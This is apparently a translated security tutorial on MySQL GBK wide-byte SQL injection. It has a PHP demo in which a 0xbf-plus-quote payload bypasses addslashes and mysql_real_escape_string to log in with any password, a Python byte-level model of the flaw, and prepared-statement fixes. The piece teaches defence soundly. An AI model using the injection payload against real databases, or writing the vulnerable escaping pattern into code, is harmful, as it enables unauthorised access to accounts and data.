MySQL Wide-Byte Injection

source link: https://3wapp.github.io/WebSecurity/mysql%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5.html

1. MySQL wide-byte injection

Whenever the trailing-byte range of a multibyte character set contains the encoding 0x5c (the backslash), wide-character injection is possible: a lead byte followed by the backslash that an escaping function inserts is read by the server as one two-byte character, so the backslash no longer protects the quote that follows it.

2. Bypassing addslashes and mysql_real_escape_string (trick)

Under MySQL 5.5.37-log this trick has already been fixed.

Demo as follows:

mysql:

mysql> create database test_gbk default charset GBK;
Query OK, 1 row affected (0.00 sec)

mysql> use test_gbk;
Database changed

mysql> CREATE TABLE users (
    username VARCHAR(32) CHARACTER SET GBK,
    password VARCHAR(32) CHARACTER SET GBK,
    PRIMARY KEY (username)
);
Query OK, 0 rows affected (0.53 sec)

mysql> insert into users SET username='t1', password='t123456';
Query OK, 1 row affected (0.01 sec)

mysql> insert into users SET username='t2', password='t223456';
Query OK, 1 row affected (0.01 sec)

mysql> insert into users SET username='t3', password='t33456';
Query OK, 1 row affected (0.01 sec)

test_gbk.php:
<?php
echo "PHP version: ".PHP_VERSION."\n";

# change to your own server, user and password
mysql_connect('servername','username','password');

mysql_select_db("test_gbk");
# SET NAMES switches the connection charset on the server side only;
# the client library is not told and keeps escaping as latin1
mysql_query("SET NAMES GBK");

# simulated attacker input: a GBK lead byte (0xbf) followed by a single quote
$_POST['username'] = chr(0xbf).chr(0x27).' OR username = username /*';
$_POST['password'] = 'guess';

# case 1: addslashes(), which knows nothing about the character set
$username = addslashes($_POST['username']);
$password = addslashes($_POST['password']);
$sql = "SELECT * FROM  users WHERE  username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);

var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());

# case 2: mysql_real_escape_string() while the client still believes the charset is latin1
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$sql = "SELECT * FROM  users WHERE  username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);

var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());

# case 3: tell the client library the real charset, then escape
mysql_set_charset("GBK");
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$sql = "SELECT * FROM  users WHERE  username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);

var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());
$php test_gbk.php

PHP version: 5.2.5  
int(3)  
string(6) "latin1"  
int(3)  
string(6) "latin1"  
int(0)  
string(3) "gbk"

Whether addslashes or mysql_real_escape_string is used, I can exploit the encoding flaw to mount an injection that logs into the server with any password!

  • Case 1: addslashes() triggers the flaw whenever MySQL is configured for GBK.
  • Case 2: mysql_real_escape_string() does not know the connection charset and escapes with the default one, which produces the flaw (SET NAMES only changed the server side; the client still reports latin1, as the mysql_client_encoding() output shows).
  • Case 3: once the connection charset is set, mysql_real_escape_string() escapes with the correct charset, and this prevents the encoding-based injection.
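The three cases above come down to what happens to the bytes. The following Python script is an added example, not code from the original post: it models, at byte level, a charset-unaware escaper (addslashes, or mysql_real_escape_string on a latin1 connection), a charset-aware escaper that also escapes a lone GBK lead byte, and a GBK-aware scanner for a single-quoted literal. The escapers and the scanner are simplified models written for this illustration, not the real PHP or MySQL implementations; the payload bytes are the ones the post uses.

```python
# Byte-level model of the GBK wide-byte escaping problem.
# Constructed example, not from the original post.  addslashes(), gbk_escape()
# and literal_end() are simplified models of the real PHP/MySQL behaviour,
# written for illustration (assumption, not the real implementations).

GBK_LEAD = range(0x81, 0xFF)                                  # first byte of a GBK pair
GBK_TRAIL = set(range(0x40, 0x7F)) | set(range(0x80, 0xFF))   # second byte; 0x5C is in it
ESCAPED = {0x00, 0x0A, 0x0D, 0x5C, 0x27, 0x22, 0x1A}          # NUL \n \r \ ' " ^Z

# The post's payload: a GBK lead byte followed by a single quote (constructed input).
PAYLOAD = bytes([0xBF, 0x27]) + b" OR username = username /*"


def addslashes(data: bytes) -> bytes:
    """Charset-unaware escaping, like PHP addslashes() or
    mysql_real_escape_string() on a connection the client believes is latin1."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def gbk_escape(data: bytes) -> bytes:
    """Charset-aware escaping.  A valid lead+trail pair is copied untouched;
    a lead byte NOT followed by a valid trail byte is itself escaped, so it
    can never absorb the backslash inserted in front of the next quote."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in GBK_LEAD and i + 1 < len(data) and data[i + 1] in GBK_TRAIL:
            out += data[i:i + 2]          # complete two-byte character
            i += 2
            continue
        if b in GBK_LEAD or b in ESCAPED:  # lone lead byte, or quote/backslash/...
            out.append(0x5C)
        out.append(b)
        i += 1
    return bytes(out)


def literal_end(sql: bytes, start: int) -> int:
    """Model of a GBK-aware server scanning a single-quoted literal from
    `start`: a valid lead+trail pair is one character, a backslash skips the
    next byte, an unescaped quote closes the literal.  Returns the index of
    the closing quote, or -1 if the literal never closes."""
    i = start
    while i < len(sql):
        b = sql[i]
        if b in GBK_LEAD and i + 1 < len(sql) and sql[i + 1] in GBK_TRAIL:
            i += 2
        elif b == 0x5C:
            i += 2
        elif b == 0x27:
            return i
        else:
            i += 1
    return -1


def build_query(escaper, username: bytes):
    """Return the SQL bytes and the index where the username literal should close."""
    prefix = b"SELECT * FROM users WHERE username = '"
    escaped = escaper(username)
    sql = prefix + escaped + b"' AND password = 'guess'"
    return sql, len(prefix) + len(escaped)


def literal_breaks_out(escaper, username: bytes = PAYLOAD) -> bool:
    """True if the escaped username closes its literal before the intended quote."""
    sql, expected_close = build_query(escaper, username)
    start = sql.index(b"'") + 1
    return literal_end(sql, start) != expected_close


if __name__ == "__main__":
    for name, esc in (("addslashes", addslashes), ("gbk_escape", gbk_escape)):
        print(f"{name:10s} first bytes={esc(PAYLOAD)[:4].hex()} "
              f"breaks out of literal: {literal_breaks_out(esc)}")
```

With addslashes the escaped username starts bf 5c 27: the scanner pairs bf with 5c as one character and the quote closes the literal early, which is the int(3) result in the demo. With the charset-aware escaper the bytes are 5c bf 5c 27: each backslash now protects exactly one byte, the literal closes where it should, and the query returns nothing, matching the int(0) of case 3. The same model also shows that a charset-unaware escaper corrupts legitimate GBK characters whose trail byte is 0x5c by doubling that byte.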

Use PDO or MySQLi, which support prepared statements, instead of mysql_query (note: mysql_query has been deprecated since PHP 5.5.0 and will be removed in the future):

$pdo = new PDO('mysql:dbname=dbtest;host=127.0.0.1;charset=utf8', 'user', 'pass');

// use real server-side prepared statements, not client-side emulation
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name');
// $name holds the untrusted input; it is bound as a parameter, never spliced into the SQL text
$stmt->execute(array('name' => $name));

foreach ($stmt as $row) {
    // do something with $row
}

MySQLi:

// $dbConnection is an open mysqli connection; $name is the untrusted input
$stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');
$stmt->bind_param('s', $name);

$stmt->execute();

$result = $stmt->get_result();
while ($row = $result->fetch_assoc()) {
    // do something with $row
}
